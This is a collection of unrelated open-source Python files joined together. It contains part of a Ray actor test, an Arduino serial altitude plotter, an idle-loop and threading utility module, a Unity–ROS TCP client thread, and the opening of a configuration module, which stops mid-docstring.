actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
|
realtime_altitude.py
|
#!/usr/bin/env python3
'''
Real-time plot demo using serial input from Arduino altitude-estimation sketch
Dependencies: numpy, matplotlib, https://github.com/simondlevy/RealtimePlotter
Copyright (C) 2018 Simon D. Levy
'''
import serial
from realtime_plot import RealtimePlotter
import numpy as np
from threading import Thread
from sys import argv
# Change these to suit your needs
PORT = '/dev/ttyACM0'
BAUD = 115200
BARO_RANGE = 1
ALTITUDE_RANGE = 5
VELOCITY_RANGE = 1
ACCELERATION_RANGE = 5
NTICKS = 10
class SerialPlotter(RealtimePlotter):
def __init__(self):
ranges = [(-lim,+lim) for lim in [BARO_RANGE, ALTITUDE_RANGE, VELOCITY_RANGE, ACCELERATION_RANGE]]
RealtimePlotter.__init__(self,
ranges,
show_yvals=True,
ylabels=['Barometer', 'Altitude', 'Velocity', 'Acceleration'],
yticks=[np.linspace(rng[0], rng[1], NTICKS-1) for rng in ranges],
window_name='Altitude Estimation',
styles=['b', 'r', 'g', 'y'])
self.tick = 0
self.vals = None
def getValues(self):
return self.vals
def _update(port, plotter):
while True:
plotter.vals = [float(s) for s in port.readline().decode()[:-2].split(',')]
plotter.tick += 1
if __name__ == '__main__':
port = argv[1] if len(argv) > 1 else PORT
try:
port = serial.Serial(port, BAUD)
except serial.SerialException:
print('Unable to open device on port %s' % PORT)
exit(1)
plotter = SerialPlotter()
thread = Thread(target=_update, args = (port, plotter))
thread.daemon = True
thread.start()
plotter.start()
|
idle.py
|
#!/usr/bin/env python
#
# idle.py - Run functions on an idle loop or in a separate thread.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module provides functions and classes for running tasks
asynchronously, either in an idle loop, or on a separate thread.
.. note:: The :class:`IdleLoop` functionality in this module is intended to be
run from within a ``wx`` application. However, it will still work
without ``wx``, albeit with slightly modified behaviour.
Idle tasks
----------
.. autosummary::
:nosignatures:
IdleLoop
idle
idleWhen
block
The :class:`IdleLoop` class provides a simple way to run a task on an ``wx``
``EVT_IDLE`` event handler. A single ``IdleLoop`` instance is created when
this module is imported; it can be accessed via the :attr:`idleLoop` attribute,
and via the module-level :func:`idle` and :func:`idleWhen` functions.
The :meth:`IdleLoop.idle` method effectively performs the same job as the
:func:`run` function (described below), but is more suitable for short tasks
which do not warrant running in a separate thread.
Thread tasks
------------
.. autosummary::
:nosignatures:
run
wait
TaskThread
The :func:`run` function simply runs a task in a separate thread. This
doesn't seem like a worthy task to have a function of its own, but the
:func:`run` function additionally provides the ability to schedule another
function to run on the ``wx.MainLoop`` when the original function has
completed (via :func:`idle`). This therefore gives us a simple way to run a
computationally intensitve task off the main GUI thread (preventing the GUI
from locking up), and to perform some clean up/refresh/notification
afterwards.
The :func:`wait` function is given one or more ``Thread`` instances, and a
task to run. It waits until all the threads have finished, and then runs
the task (via :func:`idle`).
The :class:`TaskThread` class is a simple thread which runs a queue of tasks.
Other facilities
----------------
The ``idle`` module also defines the :func:`mutex` decorator, which is
intended to be used to mark the methods of a class as being mutually exclusive.
The ``mutex`` decorator uses the :class:`MutexFactory` class to do its work.
"""
import time
import atexit
import logging
import functools
import threading
from contextlib import contextmanager
from collections import abc
try: import queue
except ImportError: import Queue as queue
log = logging.getLogger(__name__)
class IdleTask(object):
"""Container object used by the :class:`IdleLoop` class.
Used to encapsulate information about a queued task.
"""
def __init__(self,
name,
task,
schedtime,
after,
timeout,
args,
kwargs):
self.name = name
self.task = task
self.schedtime = schedtime
self.after = after
self.timeout = timeout
self.args = args
self.kwargs = kwargs
class IdleLoop(object):
"""This class contains logic for running tasks via ``wx.EVT_IDLE`` events.
A single ``IdleLoop`` instance is created when this module is first
imported - it is accessed via the module-level :attr:`idleLoop` attribute.
In normal circumstances, this ``idleLoop`` instance should be treated as a
singleton, although this is not enforced in any way.
The ``EVT_IDLE`` event is generated automatically by ``wx`` during periods
of inactivity. However, there are some circumstances in which ``EVT_IDLE``
will not be generated, and pending events may be left on the queue. For
this reason, the ``IdleLoop`` will occasionally use a ``wx.Timer`` to
ensure that it continues to be called. The time-out used by this ``Timer``
can be queried and set via the :meth:`callRate` property.
"""
def __init__(self):
"""Create an ``IdleLoop``.
This method does not do much - the real initialisation takes place
on the first call to :meth:`idle`.
"""
self.__registered = False
self.__queue = queue.Queue()
self.__queueDict = {}
self.__timer = None
self.__callRate = 200
self.__allowErrors = False
self.__neverQueue = False
# Call reset on exit, in case
# the idle.timer is active.
atexit.register(self.reset)
@property
def registered(self):
"""Boolean flag indicating whether a handler has been registered on
``wx.EVT_IDLE`` events. Checked and set in the :meth:`idle` method.
"""
return self.__registered
@property
def queue(self):
"""A ``Queue`` of functions which are to be run on the ``wx.EVT_IDLE``
loop.
"""
return self.__queue
@property
def queueDict(self):
"""A ``dict`` containing the names of all named tasks which are
currently queued on the idle loop (see the ``name`` parameter to the
:meth:`idle` method).
"""
return self.__queueDict
@property
def timer(self):
"""A ``wx.Timer`` instance which is used to periodically trigger the
:func:`_wxIdleLoop` in circumstances where ``wx.EVT_IDLE`` events may
not be generated. This is created in the first call to :meth:`idle`.
"""
return self.__timer
@property
def callRate(self):
"""Minimum time (in milliseconds) between consecutive calls to the idle
loop (:meth:`__idleLoop`). If ``wx.EVT_IDLE`` events are not being
fired, the :meth:`timer` is used to maintain the idle loop at this
rate.
"""
return self.__callRate
@callRate.setter
def callRate(self, rate):
"""Update the :meth:`callRate` to ``rate`` (specified in milliseconds).
If ``rate is None``, it is set to the default of 200 milliseconds.
"""
if rate is None:
rate = 200
log.debug('Idle loop timeout changed to {}'.format(rate))
self.__callRate = rate
@property
def allowErrors(self):
"""Used for testing/debugging. If ``True``, and a function called on
the idle loop raises an error, that error will not be caught, and the
idle loop will stop.
"""
return self.__allowErrors
@allowErrors.setter
def allowErrors(self, allow):
"""Update the ``allowErrors`` flag. """
self.__allowErrors = allow
@property
def neverQueue(self):
"""If ``True``, tasks passed to :meth:`idle` will never be queued, and
instead will always be executed directly/synchonously. See also the
:meth:`synchronous` context manager.
"""
return self.__neverQueue
@neverQueue.setter
def neverQueue(self, val):
"""Update the ``neverQueue`` flag. """
self.__neverQueue = val
@contextmanager
def synchronous(self):
"""Context manager which can be used to tenporarily set :meth:`neverQueue` to
``True``, restoring its previous value afterwards.
"""
oldval = self.__neverQueue
self.__neverQueue = True
try:
yield
finally:
self.__neverQueue = oldval
def reset(self):
"""Reset the internal idle loop state.
In a normal execution environment, this method will never need to be
called. However, in an execution environment where multiple ``wx.App``
instances are created, run, and destroyed sequentially, this function
will need to be called after each ``wx.App`` has been destroyed.
Otherwise the ``idle`` function will not work during exeution of
subsequent ``wx.App`` instances.
"""
if self.__timer is not None:
self.__timer.Stop()
# If we're atexit, the ref to
# the queue module might have
# been cleared, in which case
# we don't want to create a
# new one.
if self.__queue is not None: newQueue = queue.Queue()
else: newQueue = None
self.__registered = False
self.__queue = newQueue
self.__queueDict = {}
self.__timer = None
self.__callRate = 200
self.__allowErrors = False
self.__neverQueue = False
def inIdle(self, taskName):
"""Returns ``True`` if a task with the given name is queued on the
idle loop (or is currently running), ``False`` otherwise.
"""
return taskName in self.__queueDict
def cancelIdle(self, taskName):
"""If a task with the given ``taskName`` is in the idle queue, it
is cancelled. If the task is already running, it cannot be cancelled.
A ``KeyError`` is raised if no task called ``taskName`` exists.
"""
self.__queueDict[taskName].timeout = -1
def idle(self, task, *args, **kwargs):
"""Run the given task on a ``wx.EVT_IDLE`` event.
:arg task: The task to run.
:arg name: Optional. If provided, must be provided as a keyword
argument. Specifies a name that can be used to
query the state of this task via :meth:`inIdle`.
:arg after: Optional. If provided, must be provided as a keyword
argument. A time, in seconds, which specifies the
amount of time to wait before running this task
after it has been scheduled.
:arg timeout: Optional. If provided, must be provided as a keyword
argument. Specifies a time out, in seconds. If this
amount of time passes before the function gets
scheduled to be called on the idle loop, the
function is not called, and is dropped from the
queue.
:arg dropIfQueued: Optional. If provided, must be provided as a keyword
argument. If ``True``, and a task with the given
``name`` is already enqueud, that function is
dropped from the queue, and the new task is
enqueued. Defaults to ``False``. This argument takes
precedence over the ``skipIfQueued`` argument.
:arg skipIfQueued: Optional. If provided, must be provided as a keyword
argument. If ``True``, and a task with the given
``name`` is already enqueud, (or is running), the
function is not called. Defaults to ``False``.
:arg alwaysQueue: Optional. If provided, must be provided as a keyword
argument. If ``True``, and a ``wx.MainLoop`` is not
running, the task is enqueued anyway, under the
assumption that a ``wx.MainLoop`` will be started in
the future. Note that, if ``wx.App`` has not yet
been created, another call to ``idle`` must be made
after the app has been created for the original task
to be executed. If ``wx`` is not available, this
parameter will be ignored, and the task executed
directly.
All other arguments are passed through to the task function.
If a ``wx.App`` is not running, or :meth:`neverQueue` has been set to
``True``, the ``timeout``, ``name``, ``dropIfQueued``,
``skipIfQueued``, and ``alwaysQueue`` arguments are ignored. Instead,
the call will sleep for ``after`` seconds, and then the ``task`` will
be called directly.
.. note:: If the ``after`` argument is used, there is no guarantee that
the task will be executed in the order that it is scheduled.
This is because, if the required time has not elapsed when
the task is popped from the queue, it will be re-queued.
.. note:: If you schedule multiple tasks with the same ``name``, and
you do not use the ``skipIfQueued`` or ``dropIfQueued``
arguments, all of those tasks will be executed, but you will
only be able to query/cancel the most recently enqueued
task.
.. note:: You will run into difficulties if you schedule a function
that expects/accepts its own keyword arguments called
``name``, ``skipIfQueued``, ``dropIfQueued``, ``after``,
``timeout``, or ``alwaysQueue``.
"""
from fsl.utils.platform import platform as fslplatform
schedtime = time.time()
timeout = kwargs.pop('timeout', 0)
after = kwargs.pop('after', 0)
name = kwargs.pop('name', None)
dropIfQueued = kwargs.pop('dropIfQueued', False)
skipIfQueued = kwargs.pop('skipIfQueued', False)
alwaysQueue = kwargs.pop('alwaysQueue', False)
canHaveGui = fslplatform.canHaveGui
haveGui = fslplatform.haveGui
# If there is no possibility of a
# gui being available in the future
# (determined by canHaveGui), then
# alwaysQueue is ignored.
alwaysQueue = alwaysQueue and canHaveGui
# We don't have wx - run the task
# directly/synchronously.
if self.__neverQueue or not (haveGui or alwaysQueue):
time.sleep(after)
log.debug('Running idle task directly')
task(*args, **kwargs)
return
import wx
app = wx.GetApp()
# Register on the idle event
# if an app is available
#
# n.b. The 'app is not None' test will
# potentially fail in scenarios where
# multiple wx.Apps have been instantiated,
# as it may return a previously created
# app that is no longer active.
if (not self.registered) and (app is not None):
log.debug('Registering async idle loop')
app.Bind(wx.EVT_IDLE, self.__idleLoop)
# We also occasionally use a
# timer to drive the loop, so
# let's register that as well
self.__timer = wx.Timer(app)
self.__timer.Bind(wx.EVT_TIMER, self.__idleLoop)
self.__registered = True
# A task with the specified
# name is already in the queue
if name is not None and self.inIdle(name):
# Drop the old task
# with the same name
if dropIfQueued:
# The cancelIdle function sets the old
# task timeout to -1, so it won't get
# executed. But the task is left in the
# queue, and in the queueDict.
# In the latter, the old task gets
# overwritten with the new task below.
self.cancelIdle(name)
log.debug('Idle task ({}) is already queued - '
'dropping the old task'.format(name))
# Ignore the new task
# with the same name
elif skipIfQueued:
log.debug('Idle task ({}) is already queued '
'- skipping it'.format(name))
return
log.debug('Scheduling idle task ({}) on wx idle '
'loop'.format(getattr(task, '__name__', '<unknown>')))
idleTask = IdleTask(name,
task,
schedtime,
after,
timeout,
args,
kwargs)
self.__queue.put_nowait(idleTask)
if name is not None:
self.__queueDict[name] = idleTask
def idleWhen(self, func, condition, *args, **kwargs):
"""Poll the ``condition`` function periodically, and schedule ``func``
on :meth:`idle` when it returns ``True``.
:arg func: Function to call.
:arg condition: Function which returns ``True`` or ``False``. The
``func`` function is only called when the
``condition`` function returns ``True``.
:arg pollTime: Must be passed as a keyword argument. Time (in seconds)
to wait between successive calls to ``when``. Defaults
to ``0.2``.
"""
pollTime = kwargs.get('pollTime', 0.2)
if not condition():
self.idle(self.idleWhen,
func,
condition,
after=pollTime,
*args,
**dict(kwargs))
else:
kwargs.pop('pollTime', None)
self.idle(func, *args, **kwargs)
def __idleLoop(self, ev):
"""This method is called on ``wx.EVT_IDLE`` events, and occasionally
on ``wx.EVT_TIMER`` events via the :meth:`timer`. If there
is a function on the :meth:`queue`, it is popped and called.
.. note:: The ``wx.EVT_IDLE`` event is only triggered on user
interaction (e.g. mouse movement). This means that a
situation may arise whereby a function is queued via the
:meth:`idle` method, but no ``EVT_IDLE`` event gets
generated. Therefore, the :meth:`timer` object is
occasionally used to call this function as well.
"""
import wx
ev.Skip()
try:
task = self.__queue.get_nowait()
except queue.Empty:
# Make sure that we get called periodically,
# if EVT_IDLE decides to stop firing. If
# self.timer is None, then self.reset has
# probably been called.
if self.__timer is not None:
self.__timer.Start(self.__callRate, wx.TIMER_ONE_SHOT)
return
now = time.time()
elapsed = now - task.schedtime
queueSizeOffset = 0
taskName = task.name
funcName = getattr(task.task, '__name__', '<unknown>')
if taskName is None: taskName = funcName
else: taskName = '{} [{}]'.format(taskName, funcName)
# Has enough time elapsed
# since the task was scheduled?
# If not, re-queue the task.
# If this is the only task on the
# queue, the idle loop will be
# called again after
# callRate millisecs.
if elapsed < task.after:
log.debug('Re-queueing function ({}) on '
'wx idle loop'.format(taskName))
self.__queue.put_nowait(task)
queueSizeOffset = 1
# Has the task timed out?
elif task.timeout == 0 or (elapsed < task.timeout):
log.debug('Running function ({}) on wx '
'idle loop'.format(taskName))
try:
task.task(*task.args, **task.kwargs)
except Exception as e:
log.warning('Idle task {} crashed - {}: {}'.format(
taskName, type(e).__name__, str(e)), exc_info=True)
if self.__allowErrors:
raise e
if task.name is not None:
try: self.__queueDict.pop(task.name)
except KeyError: pass
# More tasks on the queue?
# Request anotherd event
if self.__queue.qsize() > queueSizeOffset:
ev.RequestMore()
# Otherwise use the idle
# timer to make sure that
# the loop keeps ticking
# over
else:
self.__timer.Start(self.__callRate, wx.TIMER_ONE_SHOT)
idleLoop = IdleLoop()
"""A singleton :class:`IdleLoop` instance, created when this module is
imported.
"""
def idle(*args, **kwargs):
"""Equivalent to calling :meth:`IdleLoop.idle` on the ``idleLoop``
singleton.
"""
idleLoop.idle(*args, **kwargs)
def idleWhen(*args, **kwargs):
"""Equivalent to calling :meth:`IdleLoop.idleWhen` on the ``idleLoop``
singleton.
"""
idleLoop.idleWhen(*args, **kwargs)
def block(secs, delta=0.01, until=None):
"""Blocks for the specified number of seconds, yielding to the main ``wx``
loop.
If ``wx`` is not available, or a ``wx`` application is not running, this
function is equivalent to ``time.sleep(secs)``.
If ``until`` is provided, this function will block until ``until``
returns ``True``, or ``secs`` have elapsed, whichever comes first.
:arg secs: Time in seconds to block
:arg delta: Time in seconds to sleep between successive yields to ``wx``.
:arg until: Function which returns ``True`` or ``False``, and which
determins when calls to ``block`` will return.
"""
def defaultUntil():
return False
def tick():
if fslplatform.haveGui:
import wx
wx.YieldIfNeeded()
time.sleep(delta)
if until is None:
until = defaultUntil
from fsl.utils.platform import platform as fslplatform
start = time.time()
while (time.time() - start) < secs:
tick()
if until():
break
def run(task, onFinish=None, onError=None, name=None):
"""Run the given ``task`` in a separate thread.
:arg task: The function to run. Must accept no arguments.
:arg onFinish: An optional function to schedule (on the ``wx.MainLoop``,
via :func:`idle`) once the ``task`` has finished.
:arg onError: An optional function to be called (on the ``wx.MainLoop``,
via :func:`idle`) if the ``task`` raises an error. Passed
the ``Exception`` that was raised.
:arg name: An optional name to use for this task in log statements.
:returns: A reference to the ``Thread`` that was created.
.. note:: If a ``wx`` application is not running, the ``task`` and
``onFinish`` functions will simply be called directly, and
the return value will be ``None``.
"""
from fsl.utils.platform import platform as fslplatform
if name is None:
name = getattr(task, '__name__', '<unknown>')
haveWX = fslplatform.haveGui
# Calls the onFinish or onError handler
def callback(cb, *args, **kwargs):
if cb is None:
return
if haveWX: idle(cb, *args, **kwargs)
else: cb( *args, **kwargs)
# Runs the task, and calls
# callback functions as needed.
def wrapper():
try:
task()
log.debug('Task "{}" finished'.format(name))
callback(onFinish)
except Exception as e:
log.warning('Task "{}" crashed'.format(name), exc_info=True)
callback(onError, e)
# If WX, run on a thread
if haveWX:
log.debug('Running task "{}" on thread'.format(name))
thread = threading.Thread(target=wrapper)
thread.start()
return thread
# Otherwise run directly
else:
log.debug('Running task "{}" directly'.format(name))
wrapper()
return None
def wait(threads, task, *args, **kwargs):
"""Creates and starts a new ``Thread`` which waits for all of the ``Thread``
instances to finish (by ``join``ing them), and then runs the given
``task`` via :func:`idle`.
If the ``direct`` parameter is ``True``, or a ``wx.App`` is not running,
this function ``join``s the threads directly instead of creating a new
``Thread`` to do so.
:arg threads: A ``Thread``, or a sequence of ``Thread`` instances to
join. Elements in the sequence may be ``None``.
:arg task: The task to run once all ``threads`` have completed.
:arg wait_direct: Must be passed as a keyword argument. If ``True``, this
function call will ``join`` all of the ``threads``, and
then call the ``task``. Otherwise (the default), this
function will create a new thread to ``join`` the
``threads``, and will return immediately.
All other arguments are passed to the ``task`` function.
.. note:: This function will not support ``task`` functions which expect
a keyword argument called ``wait_direct``.
"""
from fsl.utils.platform import platform as fslplatform
direct = kwargs.pop('wait_direct', False)
if not isinstance(threads, abc.Sequence):
threads = [threads]
haveWX = fslplatform.haveGui
def joinAll():
log.debug('Wait thread joining on all targets')
for t in threads:
if t is not None:
t.join()
log.debug('Wait thread scheduling task on idle loop')
idle(task, *args, **kwargs)
if haveWX and not direct:
thread = threading.Thread(target=joinAll)
thread.start()
return thread
else:
joinAll()
return None
class Task(object):
"""Container object which encapsulates a task that is run by a
:class:`TaskThread`.
"""
def __init__(self, name, func, onFinish, args, kwargs):
self.name = name
self.func = func
self.onFinish = onFinish
self.args = args
self.kwargs = kwargs
self.enabled = True
class TaskThreadVeto(Exception):
"""Task functions which are added to a :class:`TaskThread` may raise
a ``TaskThreadVeto`` error to skip processing of the task's ``onFinish``
handler (if one has been specified). See the :meth:`TaskThread.enqueue`
method for more details.
"""
pass
class TaskThread(threading.Thread):
"""The ``TaskThread`` is a simple thread which runs tasks. Tasks may be
enqueued and dequeued.
"""
def __init__(self, *args, **kwargs):
"""Create a ``TaskThread``. """
threading.Thread.__init__(self, *args, **kwargs)
self.__q = queue.Queue()
self.__enqueued = {}
self.__stop = False
log.debug('New task thread')
def enqueue(self, func, *args, **kwargs):
"""Enqueue a task to be executed.
:arg func: The task function.
:arg taskName: Task name. Must be specified as a keyword
argument. Does not necessarily have to be a string, but
must be hashable. If you wish to use the :meth:`dequeue`
or :meth:`isQueued` methods, you must provide a task
name.
:arg onFinish: An optional function to be called (via :func:`idle`)
when the task funtion has finished. Must be provided as
a keyword argument. If the ``func`` raises a
:class`TaskThreadVeto` error, this function will not
be called.
All other arguments are passed through to the task function when it is
executed.
.. note:: If the specified ``taskName`` is not unique (i.e. another
task with the same name may already be enqueued), the
:meth:`isQueued` method will probably return invalid
results.
.. warning:: Make sure that your task function is not expecting keyword
arguments called ``taskName`` or ``onFinish``!
"""
name = kwargs.pop('taskName', None)
onFinish = kwargs.pop('onFinish', None)
log.debug('Enqueueing task: {} [{}]'.format(
name, getattr(func, '__name__', '<unknown>')))
t = Task(name, func, onFinish, args, kwargs)
self.__enqueued[name] = t
self.__q.put(t)
def isQueued(self, name):
"""Returns ``True`` if a task with the given name is enqueued,
``False`` otherwise.
"""
return name in self.__enqueued
def dequeue(self, name):
"""Dequeues a previously enqueued task.
:arg name: The task to dequeue.
"""
task = self.__enqueued.get(name, None)
if task is not None:
log.debug('Dequeueing task: {}'.format(name))
task.enabled = False
def stop(self):
"""Stop the ``TaskThread`` after any currently running task has
completed.
"""
log.debug('Stopping task thread')
self.__stop = True
def waitUntilIdle(self):
"""Causes the calling thread to block until the task queue is empty.
"""
self.__q.join()
def run(self):
"""Run the ``TaskThread``. """
while True:
try:
# Clear ref to previous task if any. This
# is very important, because otherwise, if
# no tasks get posted to the queue, this
# loop will spin on queue.Empty exceptions,
# and the previous Task object will preserve
# a hanging ref to its function/method. Not
# ideal if the ref is to a method of the
# object which created this TaskThread, and
# needs to be GC'd!
task = None
# An example: Without clearing the task
# reference, the following code would
# result in the TaskThread spinning on empty
# forever, and would prevent the Blah
# instance from being GC'd:
#
# class Blah(object):
# def __init__(self):
# tt = TaskThraed()
# tt.enqueue(self.method)
# tt.start()
#
# def method(self):
# pass
#
# b = Blah()
# del b
task = self.__q.get(timeout=1)
except queue.Empty:
continue
# Any other error typically indicates
# that this is a daemon thread, and
# the TaskThread object has been GC'd
except Exception:
break
finally:
if self.__stop:
break
self.__enqueued.pop(task.name, None)
if not task.enabled:
self.__q.task_done()
continue
log.debug('Running task: {} [{}]'.format(
task.name,
getattr(task.func, '__name__', '<unknown>')))
try:
task.func(*task.args, **task.kwargs)
if task.onFinish is not None:
idle(task.onFinish)
log.debug('Task completed: {} [{}]'.format(
task.name,
getattr(task.func, '__name__', '<unknown>')))
# If the task raises a TaskThreadVeto error,
# we just have to skip the onFinish handler
except TaskThreadVeto:
log.debug('Task completed (vetoed onFinish): {} [{}]'.format(
task.name,
getattr(task.func, '__name__', '<unknown>')))
except Exception as e:
log.warning('Task crashed: {} [{}]: {}: {}'.format(
task.name,
getattr(task.func, '__name__', '<unknown>'),
type(e).__name__,
str(e)),
exc_info=True)
finally:
self.__q.task_done()
self.__q = None
self.__enqueued = None
log.debug('Task thread finished')
def mutex(*args, **kwargs):
"""Decorator for use on methods of a class, which makes the method
call mutually exclusive.
If you define a class which has one or more methods that must only
be accessed by one thread at a time, you can use the ``mutex`` decorator
to enforce this restriction. As a contrived example::
class Example(object):
def __init__(self):
self.__sharedData = []
@mutex
def dangerousMethod1(self, message):
sefl.__sharedData.append(message)
@mutex
def dangerousMethod2(self):
return sefl.__sharedData.pop()
The ``@mutex`` decorator will ensure that, at any point in time, only
one thread is running either of the ``dangerousMethod1`` or
``dangerousMethod2`` methods.
See the :class:`MutexFactory``
"""
return MutexFactory(*args, **kwargs)
class MutexFactory(object):
"""The ``MutexFactory`` is a placeholder for methods which have been
decorated with the :func:`mutex` decorator. When the method of a class
is decorated with ``@mutex``, a ``MutexFactory`` is created.
Later on, when the method is accessed on an instance, the :meth:`__get__`
method creates the true decorator function, and replaces the instance
method with that decorator.
.. note:: The ``MutexFactory`` adds an attribute called
``_async_mutex_lock`` to all instances that have
``@mutex``-decorated methods.
"""
createLock = threading.Lock()
"""This lock is used by all ``MutexFactory`` instances when a decorated
instance method is accessed for the first time.
The first time that a mutexed method is accessed on an instance, a new
``threading.Lock`` is created, to be shared by all mutexed methods of that
instance. The ``createLock`` is used to ensure that this can only occur
once for each instance.
"""
def __init__(self, function):
"""Create a ``MutexFactory``.
"""
self.__func = function
def __get__(self, instance, cls):
"""When this ``MutexFactory`` is accessed through an instance,
a decorator function is created which enforces mutually exclusive
access to the decorated method. A single ``threading.Lock`` object
is shared between all ``@mutex``-decorated methods on a single
instance.
If this ``MutexFactory`` is accessed through a class, the
decorated function is returned.
"""
# Class-level access
if instance is None:
return self.__func
# Get the lock object, creating if it necessary.
# We use the createLock in case multiple threads
# access a method at the same time, in which case
# only one of them will be able to create the
# instance lock.
with MutexFactory.createLock:
lock = getattr(instance, '_idle_mutex_lock', None)
if lock is None:
lock = threading.Lock()
instance._idle_mutex_lock = lock
# The true decorator function
def decorator(*args, **kwargs):
with instance._idle_mutex_lock:
return self.__func(instance, *args, **kwargs)
# Replace this MutexFactory with
# the decorator on the instance
decorator = functools.update_wrapper(decorator, self.__func)
setattr(instance, self.__func.__name__, decorator)
return decorator
|
client.py
|
# Copyright 2020 Unity Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import socket
import rospy
from io import BytesIO
import threading
import json
from .exceptions import TopicOrServiceNameDoesNotExistError
class ClientThread(threading.Thread):
"""
Thread class to read all data from a connection and pass along the data to the
desired source.
"""
def __init__(self, conn, tcp_server, incoming_ip, incoming_port):
"""
Set class variables
Args:
conn:
source_destination_dict: dictionary of destination name to RosCommunicator class
"""
self.conn = conn
self.tcp_server = tcp_server
self.incoming_ip = incoming_ip
self.incoming_port = incoming_port
threading.Thread.__init__(self)
@staticmethod
def recvall(conn, size, flags=0):
"""
Receive exactly bufsize bytes from the socket.
"""
buffer = bytearray(size)
view = memoryview(buffer)
pos = 0
while pos < size:
read = conn.recv_into(view[pos:], size - pos, flags)
if not read:
raise IOError("No more data available")
pos += read
return bytes(buffer)
@staticmethod
def read_int32(conn):
"""
Reads four bytes from socket connection and unpacks them to an int
Returns: int
"""
raw_bytes = ClientThread.recvall(conn, 4)
num = struct.unpack("<I", raw_bytes)[0]
return num
@staticmethod
def read_string(conn):
"""
Reads int32 from socket connection to determine how many bytes to
read to get the string that follows. Read that number of bytes and
decode to utf-8 string.
Returns: string
"""
str_len = ClientThread.read_int32(conn)
str_bytes = ClientThread.recvall(conn, str_len)
decoded_str = str_bytes.decode("utf-8")
return decoded_str
@staticmethod
def read_message(conn):
"""
Decode destination and full message size from socket connection.
Grab bytes in chunks until full message has been read.
"""
data = b""
destination = ClientThread.read_string(conn)
full_message_size = ClientThread.read_int32(conn)
while len(data) < full_message_size:
# Only grabs max of 1024 bytes TODO: change to TCPServer's buffer_size
grab = 1024 if full_message_size - len(data) > 1024 else full_message_size - len(data)
packet = ClientThread.recvall(conn, grab)
if not packet:
rospy.logerr("No packets...")
break
data += packet
if full_message_size > 0 and not data:
rospy.logerr("No data for a message size of {}, breaking!".format(full_message_size))
return
return destination, data
@staticmethod
def serialize_message(destination, message):
"""
Serialize a destination and message class.
Args:
destination: name of destination
message: message class to serialize
Returns:
serialized destination and message as a list of bytes
"""
dest_bytes = destination.encode("utf-8")
length = len(dest_bytes)
dest_info = struct.pack("<I%ss" % length, length, dest_bytes)
serial_response = BytesIO()
message.serialize(serial_response)
# Per documention, https://docs.python.org/3.8/library/io.html#io.IOBase.seek,
# seek to end of stream for length
# SEEK_SET or 0 - start of the stream (the default); offset should be zero or positive
# SEEK_CUR or 1 - current stream position; offset may be negative
# SEEK_END or 2 - end of the stream; offset is usually negative
response_len = serial_response.seek(0, 2)
msg_length = struct.pack("<I", response_len)
serialized_message = dest_info + msg_length + serial_response.getvalue()
return serialized_message
@staticmethod
def serialize_command(command, params):
cmd_bytes = command.encode("utf-8")
cmd_length = len(cmd_bytes)
cmd_info = struct.pack("<I%ss" % cmd_length, cmd_length, cmd_bytes)
json_bytes = json.dumps(params.__dict__).encode("utf-8")
json_length = len(json_bytes)
json_info = struct.pack("<I%ss" % json_length, json_length, json_bytes)
return cmd_info + json_info
def send_ros_service_request(self, srv_id, destination, data):
if destination not in self.tcp_server.source_destination_dict.keys():
error_msg = "Service destination '{}' is not registered! Known topics are: {} ".format(
destination, self.tcp_server.source_destination_dict.keys()
)
self.tcp_server.send_unity_error(error_msg)
rospy.logerr(error_msg)
# TODO: send a response to Unity anyway?
return
else:
ros_communicator = self.tcp_server.source_destination_dict[destination]
service_thread = threading.Thread(
target=self.service_call_thread, args=(srv_id, destination, data, ros_communicator)
)
service_thread.daemon = True
service_thread.start()
def service_call_thread(self, srv_id, destination, data, ros_communicator):
response = ros_communicator.send(data)
if not response:
error_msg = "No response data from service '{}'!".format(destination)
self.tcp_server.send_unity_error(error_msg)
rospy.logerr(error_msg)
# TODO: send a response to Unity anyway?
return
self.tcp_server.unity_tcp_sender.send_ros_service_response(srv_id, destination, response)
def run(self):
"""
Read a message and determine where to send it based on the source_destination_dict
and destination string. Then send the read message.
If there is a response after sending the serialized data, assume it is a
ROS service response.
Message format is expected to arrive as
int: length of destination bytes
str: destination. Publisher topic, Subscriber topic, Service name, etc
int: size of full message
msg: the ROS msg type as bytes
"""
rospy.loginfo("Connection from {}".format(self.incoming_ip))
halt_event = threading.Event()
self.tcp_server.unity_tcp_sender.start_sender(self.conn, halt_event)
try:
while not halt_event.is_set():
destination, data = self.read_message(self.conn)
if self.tcp_server.pending_srv_id is not None:
# if we've been told that the next message will be a service request/response, process it as such
if self.tcp_server.pending_srv_is_request:
self.send_ros_service_request(
self.tcp_server.pending_srv_id, destination, data
)
else:
self.tcp_server.send_unity_service_response(
self.tcp_server.pending_srv_id, data
)
self.tcp_server.pending_srv_id = None
elif destination == "":
# ignore this keepalive message, listen for more
pass
elif destination.startswith("__"):
# handle a system command, such as registering new topics
self.tcp_server.handle_syscommand(destination, data)
elif destination in self.tcp_server.source_destination_dict:
ros_communicator = self.tcp_server.source_destination_dict[destination]
response = ros_communicator.send(data)
else:
error_msg = "Topic '{}' is not registered! Known topics are: {} ".format(
destination, self.tcp_server.source_destination_dict.keys()
)
self.tcp_server.send_unity_error(error_msg)
rospy.logerr(error_msg)
except IOError as e:
rospy.logerr("Exception: {}".format(e))
finally:
halt_event.set()
self.conn.close()
rospy.loginfo("Disconnected from {}".format(self.incoming_ip))
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *nibabies* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
